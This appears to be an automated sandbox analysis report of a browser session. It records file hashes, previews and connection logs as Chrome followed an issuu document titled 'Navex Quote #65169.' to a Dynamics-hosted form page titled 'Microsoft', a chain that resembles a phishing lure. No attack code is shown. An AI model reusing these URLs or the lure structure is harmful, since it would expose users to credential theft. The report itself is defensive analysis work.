                                                                                                          MD5:575F23E96B4C82690D1DC3D898BA7216
                                                                                                          SHA1:CFE22F373146BD921A62B340FF65DA7ECA12E62C
                                                                                                          SHA-256:26260593B014F2EACEA941A254052AF765C66FF8804CAE1EEFAB88CA5B1C20D8
                                                                                                          SHA-512:5D6D439BDA7142A9606EC51850685E292F529B3BCDD6896A0F49947A0F5E3D99100A6CE4BC9CFF6D9ADC8AD5F1AFE840AF28891D1B62C0070044ACC7B9D5CFEA
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! For license information please see shareable-fullscreen.js.LICENSE.txt */.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="76c2606b-b60c-41a3-aa7b-68e55568b5d7",e._sentryDebugIdIdentifier="sentry-dbid-76c2606b-b60c-41a3-aa7b-68e55568b5d7")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"frontend-reader3@8495b66a"},(()=>{var __webpack_modules__={3896:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=class{constructor(){this.mutex=Promise.resolve()}async run(e){return new Promise(((t,r)=>{this.mutex=this.mutex.then((async()=>{try{t(await e())}catch(e){r(e)}}))}))}}},2202:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.isNotNullish=function(e){return null!=e},t.isNullis
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (7724)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):39263
                                                                                                          Entropy (8bit):5.236501795251392
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:eiO4thOzFZ5iJ7yGJwFZIiYuPzYhFZLibpswbGFZfN/0w3D4Bk0d49HyGrAv5:eiO4thOzdiJ7yGJwciYuPzYh/ibpswbl
                                                                                                          MD5:C7F5C4D01DB58FF50E7D784A0DCE6C9E
                                                                                                          SHA1:EE414C6F7761173E100FD8C64D63F69CA8458F84
                                                                                                          SHA-256:3D2442EB50043575EB36E3AF67EBCC2AD828748D4D08DD67667730D1B0A6EE40
                                                                                                          SHA-512:90A469701E44CE28DC9D536785400036AC539AA62938F9D2DE435B9A63725520C750C1BC22AFC7D92F9A6FF77730F7E3BE2D6E46EFF582F05F8604C6FA229C62
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://static.isu.pub/fe/frontend-reader3/8495b66a/shareable-fullscreen.css
                                                                                                          Preview:body,html{font-family:Inter,Inter-Regular,sans-serif;height:100%;margin:0;min-height:100%;padding:0}#app{height:100%;width:100%}body{background:#333}.@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:400;src:url(https://static.isu.pub/fonts/inter/v3_19/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7W0Q5n-wU.woff2) format("woff2");unicode-range:u+0460-052f,u+1c80-1c88,u+20b4,u+2de0-2dff,u+a640-a69f,u+fe2e-fe2f}@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:400;src:url(https://static.isu.pub/fonts/inter/v3_19/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7W0Q5n-wU.woff2) format("woff2");unicode-range:u+0301,u+0400-045f,u+0490-0491,u+04b0-04b1,u+2116}@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:400;src:url(https://static.isu.pub/fonts/inter/v3_19/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7W0Q5n-wU.woff2) format("woff2");unicode-range:u+1f??}@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:400;src:url(h
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                          Category:dropped
                                                                                                          Size (bytes):907
                                                                                                          Entropy (8bit):4.477465974969914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:tI/wX5AKCyJCvafIr5Sdj86o/IYVwUE7j90TuulNki2I/UsI/93:a/mCyJctSdjRoA9UIjKlNky8H9
                                                                                                          MD5:9269C84A186A84428C416DF1FF8749D9
                                                                                                          SHA1:6AFA63E72B3BDEAE49BE6917775D6C6EB29392C5
                                                                                                          SHA-256:14041F90346192138580F3AD85782E0254F8EFA1C66265C850606576C913CD82
                                                                                                          SHA-512:3A4C6471F30984D0F15B1F093BE274471EAC70BD1A3C0058BB12D7AD24D88090229D4A1177D6B4217501D5D081D679FF4BDBD4BBB042128345D952B8F6D5A941
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:<svg. viewBox="0 0 24 24". xmlns="http://www.w3.org/2000/svg".>. <style>. @media (prefers-color-scheme: dark) {. .path { fill: #f26f61 }. }. </style>. <path. d="M11.844 6.05c-3.04-.015-5.52 2.454-5.535 5.52-.016 3.063 2.433 5.559 5.472 5.578 3.043.02 5.524-2.449 5.543-5.511.028-3.067-2.418-5.575-5.457-5.602m-.101 8.371a2.793 2.793 0 01-2.57-1.761 2.836 2.836 0 01.64-3.067 2.778 2.778 0 013.055-.57 2.82 2.82 0 011.691 2.629 2.797 2.797 0 01-2.816 2.77zm0 0". fill="#f26f61". />. <path. d="M11.715.727H1.789a.907.907 0 00-.902.91v10c0 6.023 4.847 10.91 10.828 10.91 5.98 0 10.828-4.887 10.828-10.91 0-6.024-4.848-10.91-10.828-10.91M4.28 11.484c.04-4.183 3.434-7.539 7.586-7.5 4.149.043 7.48 3.465 7.442 7.645-.04 4.18-3.438 7.539-7.586 7.5a7.49 7.49 0 01-5.293-2.27 7.571 7.571 0 01-2.149-5.375zm0 0". fill="#f26f61". />.</svg>.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28
                                                                                                          Entropy (8bit):3.8518232255517657
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YIzMaXwLL4:YIHUL4
                                                                                                          MD5:A91B2DF397EF08D44837A896113BABDD
                                                                                                          SHA1:258DF218FFE5EF81F3CF1642DD72D84DB8D56A02
                                                                                                          SHA-256:77BD6455B48099B7ADF4B592882169278E879BD6B4FADF02139157772004F9F8
                                                                                                          SHA-512:F34F3004F5F0CF08A71FBFC9E7AE764AF19C87EF01C3CBB5E69955C6FF7A4AC35D629D6CB30E59649A136E31F14A27B1F9FBBDB5D90C192485F40DE92A30407B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"message":"Internal Error"}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):548
                                                                                                          Entropy (8bit):4.688532577858027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
                                                                                                          MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                          SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                          SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                          SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets-eur.mkt.dynamics.com/favicon.ico
                                                                                                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):765
                                                                                                          Entropy (8bit):4.863051173698089
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YCnHVx49JxleAPJu+Q760VBk9J+29JhS+8jcOv9IXEKg9q9bELGtySvhB05QKxj/:Yg1m9JBu+Q760rk9h58o6IX7btyyKjZL
                                                                                                          MD5:2B6C0554E99617BB01F827F99EFB7FB6
                                                                                                          SHA1:0B44226424B0AA4DC8757DDDBF4B0EF74A96B016
                                                                                                          SHA-256:E7238F7AFFD826165B207E8539CF774DCAFBD805EC4E1E024FEED1468D843182
                                                                                                          SHA-512:861507DBFEE579E676B99EEA27E20A1216D2612BFD5E326D9B4EA47628B8D8F4C37DA463ECFA13993289B3876D111204EEC6574F0906F246AB2B920DB8B330AF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"licenses":{"customization_set_bg_color":0,"customization_disable_share":0,"customization_remove_link_below":0,"customization_set_bg_image":0,"customization_set_logo":0,"customization_show_my_other_publications":0,"reader_themes":0,"norelated":1,"download":0,"hide_ads_in_reader":0,"inpub_ads":0,"embed":1,"remove_issuu_logo":0},"metadata":{"access":"public","contentRating":{"isReviewed":true,"isSafe":true,"isAdsafe":true,"isExplicit":false},"description":"","downloadable":false,"gated":false,"isDocumentLiked":false,"likesCount":0,"ownerType":"user","isLeadGenEnabled":false,"isLeadGenSkippable":false,"ownerId":"60822549","userId":"4375652777","publisherProfileUrl":"/txbct.com","title":"Navex Quote #65169.","userDisplayName":"txbct.com"},"visitorType":null}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):16345
                                                                                                          Entropy (8bit):7.98960525258912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                                          MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                                          SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                                          SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                                          SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                                          Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4054
                                                                                                          Entropy (8bit):7.797012573497454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                          MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                          SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                          SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                          SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                          Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12846
                                                                                                          Entropy (8bit):4.288518520651105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:na/YoUr4e5OqTI1jU+C4rH2Co+4Kwm3+mtu3bfDxphM+FII7Yis:a/2atC4rX4Kz3+mkrzhM1
                                                                                                          MD5:B6B44F066DD28661C0110ABBEE41AF69
                                                                                                          SHA1:5320B3EC3ABF15DE39E6B47AC72F46D43196D204
                                                                                                          SHA-256:03A41EBA82CF8E0DF3890D0F247EF9AC72A28FCFC264E1F104DDA587C2AA26B6
                                                                                                          SHA-512:1522B9FEF34E2F667C40547509FC8E292A3027B21CA18C93FFA407E4D5241725BFF029A0D9A017C6ECC4726A3EBEB002F704D38CA88A8FC58D303B1D1B9BD6B1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:...... .... .....6... .... ......... .... ......!..(... ...@..... .....................................................................aq..`o..ao..ao..ao..ao..ao..ao..an..O]..]l..........................................................................`o..`o.._n..cV..`n..ao..bo..am. an..ao..ao..`m..cq..an..p...`j..........................................................Nd..an..ao.._n..ao.9ao.pao.ao..ao..ao..ao..ao..ao.ao.~`n.Ean..br..an.._m..`n..........................................]t..ca.._n..bo..`o.?ao.ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao.ao.Uao..bo..ef..ff..................................^r..]s..dl..ao..ao.ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao.ao.+[y..bk..ao..........................`j..\o..ck..bn.#ao.ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao.Adv..]o..Uq......................`h..`s.._o.$ao.ao..ao..ao..ao..ao..ao..ao..ao.ao.ao.ao.ao.ao..ao..ao..ao..ao..ao..ao..ao..ao.?lm..Vq..ao..............cq..bo
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):170222
                                                                                                          Entropy (8bit):5.043706734923043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxr:jlZAqHkJeQC
                                                                                                          MD5:501A61540F1AD706F32DC3B22FFA92C3
                                                                                                          SHA1:6E8283877B215FEF5232F42C2AA6CDFDC0B7A8D6
                                                                                                          SHA-256:F5E98E2373C741C7A3D6F1C3A4B114E3F0F022C41E24EE6BA022DE985EAC773B
                                                                                                          SHA-512:3F08136147A867E43576136A2F5D82CD16AD65DC9CA77122B104151698451F2C702F14E63F35476F7CC461CDE33E28E552A7D46C6BA6B6B6AFF515E396E1DD04
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/79-4cdd0a/33-ae3d41/a5-4bf7a2/13-8e1ceb/81-32f0c0/5c-b7b685/bd-97baf6/ef-a24652?ver=2.0&_cf=20210618
                                                                                                          Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):765
                                                                                                          Entropy (8bit):4.863051173698089
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YCnHVx49JxleAPJu+Q760VBk9J+29JhS+8jcOv9IXEKg9q9bELGtySvhB05QKxj/:Yg1m9JBu+Q760rk9h58o6IX7btyyKjZL
                                                                                                          MD5:2B6C0554E99617BB01F827F99EFB7FB6
                                                                                                          SHA1:0B44226424B0AA4DC8757DDDBF4B0EF74A96B016
                                                                                                          SHA-256:E7238F7AFFD826165B207E8539CF774DCAFBD805EC4E1E024FEED1468D843182
                                                                                                          SHA-512:861507DBFEE579E676B99EEA27E20A1216D2612BFD5E326D9B4EA47628B8D8F4C37DA463ECFA13993289B3876D111204EEC6574F0906F246AB2B920DB8B330AF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://issuu.com/call/reader/dynamic/txbct.com/navex_quote_65169.
                                                                                                          Preview:{"licenses":{"customization_set_bg_color":0,"customization_disable_share":0,"customization_remove_link_below":0,"customization_set_bg_image":0,"customization_set_logo":0,"customization_show_my_other_publications":0,"reader_themes":0,"norelated":1,"download":0,"hide_ads_in_reader":0,"inpub_ads":0,"embed":1,"remove_issuu_logo":0},"metadata":{"access":"public","contentRating":{"isReviewed":true,"isSafe":true,"isAdsafe":true,"isExplicit":false},"description":"","downloadable":false,"gated":false,"isDocumentLiked":false,"likesCount":0,"ownerType":"user","isLeadGenEnabled":false,"isLeadGenSkippable":false,"ownerId":"60822549","userId":"4375652777","publisherProfileUrl":"/txbct.com","title":"Navex Quote #65169.","userDisplayName":"txbct.com"},"visitorType":null}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1048)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53758
                                                                                                          Entropy (8bit):4.633599209915522
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:SbZuXzUzUrWE2uzu4tWMu7uBVQ4V4iCqaRX7djXlx8IClse69Gxm:CZwUzUxny4oVKBm4uiFMZ3QlsT9H
                                                                                                          MD5:2F4C9C1220626E2B027717467DCA5398
                                                                                                          SHA1:3849A744B5569D6C96DC9CFA9F248B42E0915669
                                                                                                          SHA-256:A80541364FA96092FAAB217116909C9C42F87F8891C67EFFB1FFAE96558B65DC
                                                                                                          SHA-512:DCB6A160846496E9EE2C376832B5D0A61F650592AF5B7C0E5BD63F1AD769A25827B758BF3C3DC780DB2AF90184FFAB0A6B7204ECA8F3E3F85B68E0FD27AFB2B4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:<!DOCTYPE html><html><head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">. <title>Microsoft </title>. <meta name="referrer" content="never">. . <meta type="xrm/designer/setting" name="type" value="marketing-designer-content-editor-document">. <meta type="xrm/designer/setting" name="layout-editable" value="marketing-designer-layout-editable">. <style data-merge-styles="true">. .hide-on-desktop-class {. display: none !important;. }. @media only screen and (max-width: 768px) {. .tbContainer {display: block !important;}. a span {. line-height: inherit !important;. }. .multi table {. table-layout: fixed;.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):330
                                                                                                          Entropy (8bit):5.099803326742401
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Y7nS6WhWtQd1SHWcVOqSXkScL1Coo5JIJvatPSuiBEjWBOd:Y7nS6IMQiH0qkkRxoYuSuipBOd
                                                                                                          MD5:589F90BD8B26F3BE7B5192E42070B9F0
                                                                                                          SHA1:5B7D7CF1445E1E7DF68037A2D77AB587A0979790
                                                                                                          SHA-256:27C64CE43D5D910760A931D48D29E38625BC1C074C4E87063514130F78034E7D
                                                                                                          SHA-512:56D837DA2E85BF4C1D08101C9B1C4386AC593B26A67373250832277E9F16B473F277A36B22180D5AD47B0E57D69E48BC8AB6A8E6C49439FCB0B85B7B3083367A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://api.issuu.com/call/reader/links/txbct.com/navex_quote_65169.
                                                                                                          Preview:{"1":[{"id":"1379243013","x":69.74999812245369,"y":524.5000033378601,"width":472.50001287460327,"height":21.97000166773796,"page":{"pageNumber":1},"type":"openUrl","urlType":"url","url":"https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29"}]}
                                                                                                          No static file info
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 24, 2024 20:56:11.865761995 CET49675443192.168.2.4173.222.162.32
                                                                                                          Dec 24, 2024 20:56:12.637939930 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:12.637990952 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:12.638166904 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:12.638248920 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:12.638262987 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.333964109 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.334373951 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:14.334398985 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.335444927 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.335525036 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:14.336791992 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:14.336860895 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.381392002 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:14.381408930 CET44349738172.217.21.36192.168.2.4
                                                                                                          Dec 24, 2024 20:56:14.428267002 CET49738443192.168.2.4172.217.21.36
                                                                                                          Dec 24, 2024 20:56:19.489269972 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.489353895 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.489425898 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.490500927 CET49746443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.490552902 CET44349746104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.490626097 CET49746443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.490807056 CET49747443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.490822077 CET44349747104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.490876913 CET49747443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.491339922 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.491360903 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.491759062 CET49748443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.491861105 CET44349748104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.491924047 CET49748443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.492196083 CET49749443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.492238045 CET44349749104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.492286921 CET49749443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.493560076 CET49746443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.493577957 CET44349746104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.494096994 CET49747443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.494112968 CET44349747104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.494365931 CET49748443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.494405031 CET44349748104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:19.494575024 CET49749443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:19.494587898 CET44349749104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.891397953 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.891736031 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.891802073 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.893338919 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.893439054 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.894510984 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.894603014 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.894690990 CET49745443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.894707918 CET44349745104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.895771027 CET44349748104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.895951986 CET44349746104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.895994902 CET49748443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.896051884 CET44349748104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.896138906 CET49746443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.896157980 CET44349746104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.897497892 CET44349748104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.897558928 CET49748443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.897571087 CET44349746104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.897622108 CET49746443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.898041964 CET49746443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.898118973 CET44349746104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.898355961 CET49748443192.168.2.4104.17.24.14
                                                                                                          Dec 24, 2024 20:56:20.898443937 CET44349748104.17.24.14192.168.2.4
                                                                                                          Dec 24, 2024 20:56:20.898469925 CET49746443192.168.2.4104.17.24.14
